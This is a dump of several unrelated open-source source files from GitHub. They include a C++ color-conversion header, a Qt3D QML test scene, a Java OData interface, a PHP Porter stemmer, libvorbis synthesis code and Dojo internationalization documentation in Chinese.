throw new LibBaseControllerExceptionNotFound('Locatable object does not exist');
}
return $this->taggable;
}
}
| {
"pile_set_name": "Github"
} |
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2002-2012, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
#ifndef INCLUDED_IMATHCOLORALGO_H
#define INCLUDED_IMATHCOLORALGO_H
#include "ImathColor.h"
#include "ImathExport.h"
#include "ImathMath.h"
#include "ImathLimits.h"
#include "ImathNamespace.h"
IMATH_INTERNAL_NAMESPACE_HEADER_ENTER
//
// Non-templated helper routines for color conversion.
// These routines eliminate type warnings under g++.
//
IMATH_EXPORT Vec3<double> hsv2rgb_d(const Vec3<double> &hsv);
IMATH_EXPORT Color4<double> hsv2rgb_d(const Color4<double> &hsv);
IMATH_EXPORT Vec3<double> rgb2hsv_d(const Vec3<double> &rgb);
IMATH_EXPORT Color4<double> rgb2hsv_d(const Color4<double> &rgb);
//
// Color conversion functions and general color algorithms
//
// hsv2rgb(), rgb2hsv(), rgb2packed(), packed2rgb()
// see each funtion definition for details.
//
template<class T>
Vec3<T>
hsv2rgb(const Vec3<T> &hsv)
{
if ( limits<T>::isIntegral() )
{
Vec3<double> v = Vec3<double>(hsv.x / double(limits<T>::max()),
hsv.y / double(limits<T>::max()),
hsv.z / double(limits<T>::max()));
Vec3<double> c = hsv2rgb_d(v);
return Vec3<T>((T) (c.x * limits<T>::max()),
(T) (c.y * limits<T>::max()),
(T) (c.z * limits<T>::max()));
}
else
{
Vec3<double> v = Vec3<double>(hsv.x, hsv.y, hsv.z);
Vec3<double> c = hsv2rgb_d(v);
return Vec3<T>((T) c.x, (T) c.y, (T) c.z);
}
}
template<class T>
Color4<T>
hsv2rgb(const Color4<T> &hsv)
{
if ( limits<T>::isIntegral() )
{
Color4<double> v = Color4<double>(hsv.r / float(limits<T>::max()),
hsv.g / float(limits<T>::max()),
hsv.b / float(limits<T>::max()),
hsv.a / float(limits<T>::max()));
Color4<double> c = hsv2rgb_d(v);
return Color4<T>((T) (c.r * limits<T>::max()),
(T) (c.g * limits<T>::max()),
(T) (c.b * limits<T>::max()),
(T) (c.a * limits<T>::max()));
}
else
{
Color4<double> v = Color4<double>(hsv.r, hsv.g, hsv.b, hsv.a);
Color4<double> c = hsv2rgb_d(v);
return Color4<T>((T) c.r, (T) c.g, (T) c.b, (T) c.a);
}
}
template<class T>
Vec3<T>
rgb2hsv(const Vec3<T> &rgb)
{
if ( limits<T>::isIntegral() )
{
Vec3<double> v = Vec3<double>(rgb.x / double(limits<T>::max()),
rgb.y / double(limits<T>::max()),
rgb.z / double(limits<T>::max()));
Vec3<double> c = rgb2hsv_d(v);
return Vec3<T>((T) (c.x * limits<T>::max()),
(T) (c.y * limits<T>::max()),
(T) (c.z * limits<T>::max()));
}
else
{
Vec3<double> v = Vec3<double>(rgb.x, rgb.y, rgb.z);
Vec3<double> c = rgb2hsv_d(v);
return Vec3<T>((T) c.x, (T) c.y, (T) c.z);
}
}
template<class T>
Color4<T>
rgb2hsv(const Color4<T> &rgb)
{
if ( limits<T>::isIntegral() )
{
Color4<double> v = Color4<double>(rgb.r / float(limits<T>::max()),
rgb.g / float(limits<T>::max()),
rgb.b / float(limits<T>::max()),
rgb.a / float(limits<T>::max()));
Color4<double> c = rgb2hsv_d(v);
return Color4<T>((T) (c.r * limits<T>::max()),
(T) (c.g * limits<T>::max()),
(T) (c.b * limits<T>::max()),
(T) (c.a * limits<T>::max()));
}
else
{
Color4<double> v = Color4<double>(rgb.r, rgb.g, rgb.b, rgb.a);
Color4<double> c = rgb2hsv_d(v);
return Color4<T>((T) c.r, (T) c.g, (T) c.b, (T) c.a);
}
}
template <class T>
PackedColor
rgb2packed(const Vec3<T> &c)
{
if ( limits<T>::isIntegral() )
{
float x = c.x / float(limits<T>::max());
float y = c.y / float(limits<T>::max());
float z = c.z / float(limits<T>::max());
return rgb2packed( V3f(x,y,z) );
}
else
{
return ( (PackedColor) (c.x * 255) |
(((PackedColor) (c.y * 255)) << 8) |
(((PackedColor) (c.z * 255)) << 16) | 0xFF000000 );
}
}
template <class T>
PackedColor
rgb2packed(const Color4<T> &c)
{
if ( limits<T>::isIntegral() )
{
float r = c.r / float(limits<T>::max());
float g = c.g / float(limits<T>::max());
float b = c.b / float(limits<T>::max());
float a = c.a / float(limits<T>::max());
return rgb2packed( C4f(r,g,b,a) );
}
else
{
return ( (PackedColor) (c.r * 255) |
(((PackedColor) (c.g * 255)) << 8) |
(((PackedColor) (c.b * 255)) << 16) |
(((PackedColor) (c.a * 255)) << 24));
}
}
//
// This guy can't return the result because the template
// parameter would not be in the function signiture. So instead,
// its passed in as an argument.
//
template <class T>
void
packed2rgb(PackedColor packed, Vec3<T> &out)
{
if ( limits<T>::isIntegral() )
{
T f = limits<T>::max() / ((PackedColor)0xFF);
out.x = (packed & 0xFF) * f;
out.y = ((packed & 0xFF00) >> 8) * f;
out.z = ((packed & 0xFF0000) >> 16) * f;
}
else
{
T f = T(1) / T(255);
out.x = (packed & 0xFF) * f;
out.y = ((packed & 0xFF00) >> 8) * f;
out.z = ((packed & 0xFF0000) >> 16) * f;
}
}
template <class T>
void
packed2rgb(PackedColor packed, Color4<T> &out)
{
if ( limits<T>::isIntegral() )
{
T f = limits<T>::max() / ((PackedColor)0xFF);
out.r = (packed & 0xFF) * f;
out.g = ((packed & 0xFF00) >> 8) * f;
out.b = ((packed & 0xFF0000) >> 16) * f;
out.a = ((packed & 0xFF000000) >> 24) * f;
}
else
{
T f = T(1) / T(255);
out.r = (packed & 0xFF) * f;
out.g = ((packed & 0xFF00) >> 8) * f;
out.b = ((packed & 0xFF0000) >> 16) * f;
out.a = ((packed & 0xFF000000) >> 24) * f;
}
}
IMATH_INTERNAL_NAMESPACE_HEADER_EXIT
#endif // INCLUDED_IMATHCOLORALGO_H
| {
"pile_set_name": "Github"
} |
---
# vars file for cifv2
| {
"pile_set_name": "Github"
} |
/****************************************************************************
**
** Copyright (C) 2018 Klaralvdalens Datakonsult AB (KDAB).
** Contact: https://www.qt.io/licensing/
**
** This file is part of the Qt3D module of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:BSD$
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this file in
** accordance with the commercial license agreement provided with the
** Software or, alternatively, in accordance with the terms contained in
** a written agreement between you and The Qt Company. For licensing terms
** and conditions see https://www.qt.io/terms-conditions. For further
** information use the contact form at https://www.qt.io/contact-us.
**
** BSD License Usage
** Alternatively, you may use this file under the terms of the BSD license
** as follows:
**
** "Redistribution and use in source and binary forms, with or without
** modification, are permitted provided that the following conditions are
** met:
** * Redistributions of source code must retain the above copyright
** notice, this list of conditions and the following disclaimer.
** * Redistributions in binary form must reproduce the above copyright
** notice, this list of conditions and the following disclaimer in
** the documentation and/or other materials provided with the
** distribution.
** * Neither the name of The Qt Company Ltd nor the names of its
** contributors may be used to endorse or promote products derived
** from this software without specific prior written permission.
**
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
** OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
** LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
** DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
** THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
** OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
**
** $QT_END_LICENSE$
**
****************************************************************************/
import Qt3D.Core 2.0
import Qt3D.Render 2.13
import Qt3D.Extras 2.0
import QtQuick.Window 2.0
Entity {
id: sceneRoot
Window {
id: win
width: 600
height: 600
visible: true
}
Camera {
id: camera
projectionType: CameraLens.PerspectiveProjection
fieldOfView: 45
nearPlane : 0.1
farPlane : 1000.0
position: Qt.vector3d( 0.0, 0.0, -40.0 )
upVector: Qt.vector3d( 0.0, 1.0, 0.0 )
viewCenter: Qt.vector3d( 0.0, 0.0, 0.0 )
}
components: [
RenderSettings {
activeFrameGraph: Viewport {
normalizedRect: Qt.rect(0.0, 0.0, 1.0, 1.0)
RenderSurfaceSelector {
surface: win
ClearBuffers {
buffers : ClearBuffers.ColorDepthBuffer
NoDraw {}
}
CameraSelector {
camera: camera
}
}
}
pickingSettings {
pickResultMode: PickingSettings.NearestPriorityPick
pickMethod: PickingSettings.TrianglePicking
faceOrientationPickingMode: PickingSettings.FrontAndBackFace
}
}
]
CuboidMesh { id: cubeMesh }
PhongMaterial { id: material }
// Entity 1
Entity {
property ObjectPicker picker: ObjectPicker {
id: picker1
objectName: "Picker1"
}
property Transform transform: Transform {
translation: Qt.vector3d(0, 0, 0)
scale: 2.0
}
components: [cubeMesh, material, picker1, transform]
}
// Entity 2
Entity {
property ObjectPicker picker: ObjectPicker {
id: picker2
objectName: "Picker2"
}
property Transform transform: Transform {
translation: Qt.vector3d(0, 0, 10)
scale: 2.5
}
components: [cubeMesh, material, picker2, transform]
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.olingo.client.api.domain;
import java.net.URI;
import java.util.List;
/**
* OData entity collection. If pagination was used to get this instance, forward page navigation URI will be available.
*/
public interface ClientEntitySet extends ClientInvokeResult, ClientAnnotatable {
/**
* Gets next page link.
*
* @return next page link; null value if single page or last page reached.
*/
URI getNext();
/**
* Gets contained entities.
*
* @return entity set's entities.
*/
List<ClientEntity> getEntities();
/**
* Gets in-line count.
*
* @return in-line count value.
*/
Integer getCount();
/**
* Sets in-line count.
*
* @param count in-line count value.
*/
void setCount(final int count);
/**
* Gets delta link if exists.
*
* @return delta link if exists; null otherwise.
*/
URI getDeltaLink();
/**
* Sets delta link.
*
* @param deltaLink delta link.
*/
void setDeltaLink(URI deltaLink);
/**
* Searches for operation with given title.
*
* @param title operation to look for
* @return operation if found with given title, <tt>null</tt> otherwise
*/
ClientOperation getOperation(String title);
/**
* Gets operations.
*
* @return operations.
*/
List<ClientOperation> getOperations();
}
| {
"pile_set_name": "Github"
} |
<?php
/**
* Part of the Joomla Framework Language Package
*
* @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
* @copyright Copyright (C) 2005 Richard Heyes (http://www.phpguru.org/). All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
namespace Joomla\Language\Stemmer;
use Joomla\Language\Stemmer;
/**
* Porter English stemmer class.
*
* This class was adapted from one written by Richard Heyes.
* See copyright and link information above.
*
* @since 1.0
*/
class Porteren extends Stemmer
{
/**
* Regex for matching a consonant.
*
* @var string
* @since 1.0
*/
private static $regex_consonant = '(?:[bcdfghjklmnpqrstvwxz]|(?<=[aeiou])y|^y)';
/**
* Regex for matching a vowel
* @var string
* @since 1.0
*/
private static $regex_vowel = '(?:[aeiou]|(?<![aeiou])y)';
/**
* Method to stem a token and return the root.
*
* @param string $token The token to stem.
* @param string $lang The language of the token.
*
* @return string The root token.
*
* @since 1.0
*/
public function stem($token, $lang)
{
// Check if the token is long enough to merit stemming.
if (strlen($token) <= 2)
{
return $token;
}
// Check if the language is English or All.
if ($lang !== 'en')
{
return $token;
}
// Stem the token if it is not in the cache.
if (!isset($this->cache[$lang][$token]))
{
// Stem the token.
$result = $token;
$result = self::step1ab($result);
$result = self::step1c($result);
$result = self::step2($result);
$result = self::step3($result);
$result = self::step4($result);
$result = self::step5($result);
// Add the token to the cache.
$this->cache[$lang][$token] = $result;
}
return $this->cache[$lang][$token];
}
/**
* Step 1
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step1ab($word)
{
// Part a
if (substr($word, -1) == 's')
{
self::replace($word, 'sses', 'ss')
or self::replace($word, 'ies', 'i')
or self::replace($word, 'ss', 'ss')
or self::replace($word, 's', '');
}
// Part b
if (substr($word, -2, 1) != 'e' or !self::replace($word, 'eed', 'ee', 0))
{
// First rule
$v = self::$regex_vowel;
// Check ing and ed
// Note use of && and OR, for precedence reasons
if (preg_match("#$v+#", substr($word, 0, -3)) && self::replace($word, 'ing', '')
or preg_match("#$v+#", substr($word, 0, -2)) && self::replace($word, 'ed', ''))
{
// If one of above two test successful
if (!self::replace($word, 'at', 'ate') and !self::replace($word, 'bl', 'ble') and !self::replace($word, 'iz', 'ize'))
{
// Double consonant ending
if (self::doubleConsonant($word) and substr($word, -2) != 'll' and substr($word, -2) != 'ss' and substr($word, -2) != 'zz')
{
$word = substr($word, 0, -1);
}
elseif (self::m($word) == 1 and self::cvc($word))
{
$word .= 'e';
}
}
}
}
return $word;
}
/**
* Step 1c
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step1c($word)
{
$v = self::$regex_vowel;
if (substr($word, -1) == 'y' && preg_match("#$v+#", substr($word, 0, -1)))
{
self::replace($word, 'y', 'i');
}
return $word;
}
/**
* Step 2
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step2($word)
{
switch (substr($word, -2, 1))
{
case 'a':
self::replace($word, 'ational', 'ate', 0)
or self::replace($word, 'tional', 'tion', 0);
break;
case 'c':
self::replace($word, 'enci', 'ence', 0)
or self::replace($word, 'anci', 'ance', 0);
break;
case 'e':
self::replace($word, 'izer', 'ize', 0);
break;
case 'g':
self::replace($word, 'logi', 'log', 0);
break;
case 'l':
self::replace($word, 'entli', 'ent', 0)
or self::replace($word, 'ousli', 'ous', 0)
or self::replace($word, 'alli', 'al', 0)
or self::replace($word, 'bli', 'ble', 0)
or self::replace($word, 'eli', 'e', 0);
break;
case 'o':
self::replace($word, 'ization', 'ize', 0)
or self::replace($word, 'ation', 'ate', 0)
or self::replace($word, 'ator', 'ate', 0);
break;
case 's':
self::replace($word, 'iveness', 'ive', 0)
or self::replace($word, 'fulness', 'ful', 0)
or self::replace($word, 'ousness', 'ous', 0)
or self::replace($word, 'alism', 'al', 0);
break;
case 't':
self::replace($word, 'biliti', 'ble', 0)
or self::replace($word, 'aliti', 'al', 0)
or self::replace($word, 'iviti', 'ive', 0);
break;
}
return $word;
}
/**
* Step 3
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step3($word)
{
switch (substr($word, -2, 1))
{
case 'a':
self::replace($word, 'ical', 'ic', 0);
break;
case 's':
self::replace($word, 'ness', '', 0);
break;
case 't':
self::replace($word, 'icate', 'ic', 0)
or self::replace($word, 'iciti', 'ic', 0);
break;
case 'u':
self::replace($word, 'ful', '', 0);
break;
case 'v':
self::replace($word, 'ative', '', 0);
break;
case 'z':
self::replace($word, 'alize', 'al', 0);
break;
}
return $word;
}
/**
* Step 4
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step4($word)
{
switch (substr($word, -2, 1))
{
case 'a':
self::replace($word, 'al', '', 1);
break;
case 'c':
self::replace($word, 'ance', '', 1)
or self::replace($word, 'ence', '', 1);
break;
case 'e':
self::replace($word, 'er', '', 1);
break;
case 'i':
self::replace($word, 'ic', '', 1);
break;
case 'l':
self::replace($word, 'able', '', 1)
or self::replace($word, 'ible', '', 1);
break;
case 'n':
self::replace($word, 'ant', '', 1)
or self::replace($word, 'ement', '', 1)
or self::replace($word, 'ment', '', 1)
or self::replace($word, 'ent', '', 1);
break;
case 'o':
if (substr($word, -4) == 'tion' or substr($word, -4) == 'sion')
{
self::replace($word, 'ion', '', 1);
}
else
{
self::replace($word, 'ou', '', 1);
}
break;
case 's':
self::replace($word, 'ism', '', 1);
break;
case 't':
self::replace($word, 'ate', '', 1)
or self::replace($word, 'iti', '', 1);
break;
case 'u':
self::replace($word, 'ous', '', 1);
break;
case 'v':
self::replace($word, 'ive', '', 1);
break;
case 'z':
self::replace($word, 'ize', '', 1);
break;
}
return $word;
}
/**
* Step 5
*
* @param string $word The token to stem.
*
* @return string
*
* @since 1.0
*/
private static function step5($word)
{
// Part a
if (substr($word, -1) == 'e')
{
if (self::m(substr($word, 0, -1)) > 1)
{
self::replace($word, 'e', '');
}
elseif (self::m(substr($word, 0, -1)) == 1)
{
if (!self::cvc(substr($word, 0, -1)))
{
self::replace($word, 'e', '');
}
}
}
// Part b
if (self::m($word) > 1 and self::doubleConsonant($word) and substr($word, -1) == 'l')
{
$word = substr($word, 0, -1);
}
return $word;
}
/**
* Replaces the first string with the second, at the end of the string. If third
* arg is given, then the preceding string must match that m count at least.
*
* @param string &$str String to check
* @param string $check Ending to check for
* @param string $repl Replacement string
* @param integer $m Optional minimum number of m() to meet
*
* @return boolean Whether the $check string was at the end
* of the $str string. True does not necessarily mean
* that it was replaced.
*
* @since 1.0
*/
private static function replace(&$str, $check, $repl, $m = null)
{
$len = 0 - strlen($check);
if (substr($str, $len) == $check)
{
$substr = substr($str, 0, $len);
if (is_null($m) or self::m($substr) > $m)
{
$str = $substr . $repl;
}
return true;
}
return false;
}
/**
* m() measures the number of consonant sequences in $str. if c is
* a consonant sequence and v a vowel sequence, and <..> indicates arbitrary
* presence,
*
* <c><v> gives 0
* <c>vc<v> gives 1
* <c>vcvc<v> gives 2
* <c>vcvcvc<v> gives 3
*
* @param string $str The string to return the m count for
*
* @return integer The m count
*
* @since 1.0
*/
private static function m($str)
{
$c = self::$regex_consonant;
$v = self::$regex_vowel;
$str = preg_replace("#^$c+#", '', $str);
$str = preg_replace("#$v+$#", '', $str);
preg_match_all("#($v+$c+)#", $str, $matches);
return count($matches[1]);
}
/**
* Returns true/false as to whether the given string contains two
* of the same consonant next to each other at the end of the string.
*
* @param string $str String to check
*
* @return boolean Result
*
* @since 1.0
*/
private static function doubleConsonant($str)
{
$c = self::$regex_consonant;
return preg_match("#$c{2}$#", $str, $matches) and $matches[0]{0} == $matches[0]{1};
}
/**
* Checks for ending CVC sequence where second C is not W, X or Y
*
* @param string $str String to check
*
* @return boolean Result
*
* @since 1.0
*/
private static function cvc($str)
{
$c = self::$regex_consonant;
$v = self::$regex_vowel;
$result = preg_match("#($c$v$c)$#", $str, $matches)
and strlen($matches[1]) == 3
and $matches[1]{2} != 'w'
and $matches[1]{2} != 'x'
and $matches[1]{2} != 'y';
return $result;
}
}
| {
"pile_set_name": "Github"
} |
Hi <?php echo $fullname; ?>,
Your login details are given below :
Username : <?php echo $username; ?>
Password : <?php echo $password; ?>
Login URL : <?php echo $this->Html->url(array('controller' => 'wzusers', 'action' => 'login'), true); ?>
Please change your password immediatly after login.
-- <?php echo $sitename; ?> team
| {
"pile_set_name": "Github"
} |
/********************************************************************
* *
* THIS FILE IS PART OF THE OggVorbis SOFTWARE CODEC SOURCE CODE. *
* USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS *
* GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE *
* IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. *
* *
* THE OggVorbis SOURCE CODE IS (C) COPYRIGHT 1994-2015 *
* by the Xiph.Org Foundation https://xiph.org/ *
* *
********************************************************************
function: single-block PCM synthesis
********************************************************************/
#include <stdio.h>
#include <ogg/ogg.h>
#include "vorbis/codec.h"
#include "codec_internal.h"
#include "registry.h"
#include "misc.h"
#include "os.h"
int vorbis_synthesis(vorbis_block *vb,ogg_packet *op){
vorbis_dsp_state *vd= vb ? vb->vd : 0;
private_state *b= vd ? vd->backend_state : 0;
vorbis_info *vi= vd ? vd->vi : 0;
codec_setup_info *ci= vi ? vi->codec_setup : 0;
oggpack_buffer *opb=vb ? &vb->opb : 0;
int type,mode,i;
if (!vd || !b || !vi || !ci || !opb) {
return OV_EBADPACKET;
}
/* first things first. Make sure decode is ready */
_vorbis_block_ripcord(vb);
oggpack_readinit(opb,op->packet,op->bytes);
/* Check the packet type */
if(oggpack_read(opb,1)!=0){
/* Oops. This is not an audio data packet */
return(OV_ENOTAUDIO);
}
/* read our mode and pre/post windowsize */
mode=oggpack_read(opb,b->modebits);
if(mode==-1){
return(OV_EBADPACKET);
}
vb->mode=mode;
if(!ci->mode_param[mode]){
return(OV_EBADPACKET);
}
vb->W=ci->mode_param[mode]->blockflag;
if(vb->W){
/* this doesn;t get mapped through mode selection as it's used
only for window selection */
vb->lW=oggpack_read(opb,1);
vb->nW=oggpack_read(opb,1);
if(vb->nW==-1){
return(OV_EBADPACKET);
}
}else{
vb->lW=0;
vb->nW=0;
}
/* more setup */
vb->granulepos=op->granulepos;
vb->sequence=op->packetno;
vb->eofflag=op->e_o_s;
/* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;i<vi->channels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));
/* unpack_header enforces range checking */
type=ci->map_type[ci->mode_param[mode]->mapping];
return(_mapping_P[type]->inverse(vb,ci->map_param[ci->mode_param[mode]->
mapping]));
}
/* used to track pcm position without actually performing decode.
Useful for sequential 'fast forward' */
int vorbis_synthesis_trackonly(vorbis_block *vb,ogg_packet *op){
vorbis_dsp_state *vd=vb->vd;
private_state *b=vd->backend_state;
vorbis_info *vi=vd->vi;
codec_setup_info *ci=vi->codec_setup;
oggpack_buffer *opb=&vb->opb;
int mode;
/* first things first. Make sure decode is ready */
_vorbis_block_ripcord(vb);
oggpack_readinit(opb,op->packet,op->bytes);
/* Check the packet type */
if(oggpack_read(opb,1)!=0){
/* Oops. This is not an audio data packet */
return(OV_ENOTAUDIO);
}
/* read our mode and pre/post windowsize */
mode=oggpack_read(opb,b->modebits);
if(mode==-1)return(OV_EBADPACKET);
vb->mode=mode;
if(!ci->mode_param[mode]){
return(OV_EBADPACKET);
}
vb->W=ci->mode_param[mode]->blockflag;
if(vb->W){
vb->lW=oggpack_read(opb,1);
vb->nW=oggpack_read(opb,1);
if(vb->nW==-1) return(OV_EBADPACKET);
}else{
vb->lW=0;
vb->nW=0;
}
/* more setup */
vb->granulepos=op->granulepos;
vb->sequence=op->packetno;
vb->eofflag=op->e_o_s;
/* no pcm */
vb->pcmend=0;
vb->pcm=NULL;
return(0);
}
long vorbis_packet_blocksize(vorbis_info *vi,ogg_packet *op){
codec_setup_info *ci=vi->codec_setup;
oggpack_buffer opb;
int mode;
if(ci==NULL || ci->modes<=0){
/* codec setup not properly intialized */
return(OV_EFAULT);
}
oggpack_readinit(&opb,op->packet,op->bytes);
/* Check the packet type */
if(oggpack_read(&opb,1)!=0){
/* Oops. This is not an audio data packet */
return(OV_ENOTAUDIO);
}
/* read our mode and pre/post windowsize */
mode=oggpack_read(&opb,ov_ilog(ci->modes-1));
if(mode==-1 || !ci->mode_param[mode])return(OV_EBADPACKET);
return(ci->blocksizes[ci->mode_param[mode]->blockflag]);
}
int vorbis_synthesis_halfrate(vorbis_info *vi,int flag){
/* set / clear half-sample-rate mode */
codec_setup_info *ci=vi->codec_setup;
/* right now, our MDCT can't handle < 64 sample windows. */
if(ci->blocksizes[0]<=64 && flag)return -1;
ci->halfrate_flag=(flag?1:0);
return 0;
}
int vorbis_synthesis_halfrate_p(vorbis_info *vi){
codec_setup_info *ci=vi->codec_setup;
return ci->halfrate_flag;
}
| {
"pile_set_name": "Github"
} |
# 介绍
<!--
https://github.com/dojo/framework/blob/master/docs/en/i18n/introduction.md
commit 3064b7ce80fa19569f8975e9aa5d06718ca8decb
-->
Dojo 的 **`i18n`** 包解决了 web 应用程序国际化方面的诸多常见需求和挑战。
虽然其中大部分功能可作为独立模块使用,但它主要用于 Dojo 应用程序,以帮助渲染本地化的部件,包括高级消息、日期和数字格式化等。
| 功能 | 描述 |
| -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **本地化单个部件** | 每个部件实例都可以有自己的本地化设置,能够在单个应用程序中显示多套本地化数据。如果没有指定,部件将回退使用当前的根区域设置(root locale)。 |
| **精细控制的消息包** | 包可以被拆分并作用于单个部件,并且只有使用了某一个区域设置时才延迟加载。这样,消息包也可以充分利用应用程序其他资源使用的分层和按包交付技术。 |
| **本地化的消息、日期和数字格式** | 使用行业标准的 [Unicode CLDR 格式化](http://cldr.unicode.org/)规则。在构建时,会将用到的 CLDR 数据自动注入到应用程序中。 |
| **响应式的区域设置** | 与 Dojo 应用程序其他响应式的状态更改类似,当改变区域设置后,会自动重载消息,并重新渲染受影响的部件。<br>如果单独使用 `i18n` 模块(如用在非 dojo 应用程序中),则可以通过监听器的回调函数来指定区域变更事件。 |
| **可回退的区域设置检测** | 如果没有显式指定根区域,则必须确保设置了默认区域。<br>系统的区域设置(当运行在服务器端时,指进程或主机的区域设置)会与 `.dojorc` 中定义的区域列表匹配。如果支持系统的区域设置,则将其设置为默认值。否则,使用 `.dojorc` 中定义的默认区域。 |
# 基本用法
## 国际化部件
- 从单个默认语言开始(英语)。
> .dojorc
```ts
{
"build-app": {
"locale": "en"
}
}
```
> src/widgets/MyI18nWidget.tsx
**基于函数的部件:**
```tsx
import { create, tsx } from '@dojo/framework/core/vdom';
import i18n from '@dojo/framework/core/middleware/i18n';
import myWidgetMessageBundle from '../nls/en/MyI18nWidget.ts';
const factory = create({ i18n });
export default factory(function MyI18nWidget({ middleware: { i18n } }) {
const { messages } = i18n.localize(myWidgetMessageBundle);
return <div title={messages.title}>{messages.content}</div>;
});
```
**基于类的部件:**
```tsx
import { WidgetBase } from '@dojo/framework/core/WidgetBase';
import { tsx } from '@dojo/framework/core/vdom';
import I18nMixin from '@dojo/framework/core/mixins/I18n';
import myWidgetMessageBundle from '../nls/en/MyI18nWidget.ts';
export default class MyI18nWidget extends I18nMixin(WidgetBase) {
protected render() {
const { messages } = this.localizeBundle(myWidgetMessageBundle);
return <div title={messages.title}>{messages.content}</div>;
}
}
```
> src/nls/en/MyI18nWidget.ts
```ts
export default {
messages: {
title: 'Hello',
content: 'This is an internationalized widget'
}
};
```
## 添加部件的本地化语言包
- 支持两种语言 - 默认为英语,同时也支持法语翻译,任何将 `fr` 设置为主要语言的用户都会使用法语翻译。
> .dojorc
```ts
{
"build-app": {
"locale": "en",
"supportedLocales": [ "fr" ]
}
}
```
> src/nls/en/MyI18nWidget.ts
```ts
export default {
locales: {
fr: () => import('../fr/MyI18nWidget')
},
messages: {
title: 'Hello',
content: 'This is an internationalized widget'
}
};
```
> src/nls/fr/MyI18nWidget.ts
```ts
export default {
title: 'Bonjour',
content: 'Ceci est un widget internationalisé'
};
```
## 在应用程序中指定根区域
在应用程序中只使用基于函数的部件和 `i18n` 中间件,则意味着无需在应用程序的 `main.ts` 或 `main.tsx` 入口点添加引导代码(bootstrapping code)。使用 `@dojo/framework/core/middleware/i18n` 中的 `i18n` 中间件,可以在顶层的 `App` 部件中设置默认区域。尚未定义区域时,可设置默认区域。
> src/App.tsx
```ts
import { create, tsx } from '@dojo/framework/core/vdom';
const factory = create({ i18n });
export default factory(function App({ middleware: { i18n } }) {
if (!i18n.get()) {
i18n.set({ locale: 'en-us', rtl: false });
}
return <div>{/* the application widgets */}</div>;
});
```
